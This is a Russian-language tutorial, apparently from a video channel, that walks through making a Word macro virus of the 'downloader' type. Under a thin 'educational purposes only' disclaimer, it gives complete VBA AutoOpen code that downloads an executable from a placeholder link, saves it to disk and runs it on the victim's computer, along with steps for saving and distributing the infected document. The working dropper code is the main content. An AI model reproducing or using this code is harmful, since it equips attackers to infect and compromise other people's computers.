Всем привет, Макрос-представляет собой инструмент в программе MS.Word, который позволяет запоминать какие-либо определенные задачи и действия, а потом в дальнейшем автоматически их выполнять.
Понятно что это полезная фича, но любую полезную фичу можно превратить в баг или уязвимость.Так появились Макровирусы
Вся информация представлена только для образовательных целей, для укрепления вашей же защиты,некий аудит по безопасности.
Макровирусы пишутся на языке программирования Visual Basic (вообще макросы пишутся на бэйзике) ,IDE для Basic в Windows установлена по умолчанию.Макровирусом можно переполнить буфер обмена, ОЗУ, жесткий диск итд., коротко говоря, навредить вашему компьютеру.
Но сегодня мы рассмотрим Downloader т.е макровирус, который скачает вирус из интернета и запустит его на компьютере жертвы.
Итак начнём:
Открываем Ms.Word любой версии, у меня 2003:
Переходим во вкладку Сервис и находим так Макрос далее нажимаем на Макросы:
Далее, вводим имя макроса,любое на английском, и нажимаем на Создать
Видим это:
Стераем там всё и ставим этот код:
Sub AutoOpen()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "link_to_exe", False
xHttp.Send
With bStrm
.Type = 1 '//binary
.Open
.write xHttp.responseBody
.savetofile "name.exe", 2 '//overwrite
End With
Shell ("name.exe")
End Sub
Должно быть прям как у меня:
Соответственно link_to_exe это прямая ссылка к нашему "вирусу". Ссылка на скачивание. "name.exe" -это название , имя "вируса".
После этого, просто закрываете Visual Basic(там авто сохранение)
И сохраняете документ, Тип файла указываете с поддержкой макросов:
И всё, у нас появится вот такой документ:
Иконка так и говорит что тут, что то не то.
После запуска этого документа у нас спросят включить или отключить маросы, если вы нажмёте на Ок, то малварь скачается с интернета, и запустится.
А на этом всё, подписывайтесь на мой канал
Будет очень, очень много интересного
Всем спасибо всем пока
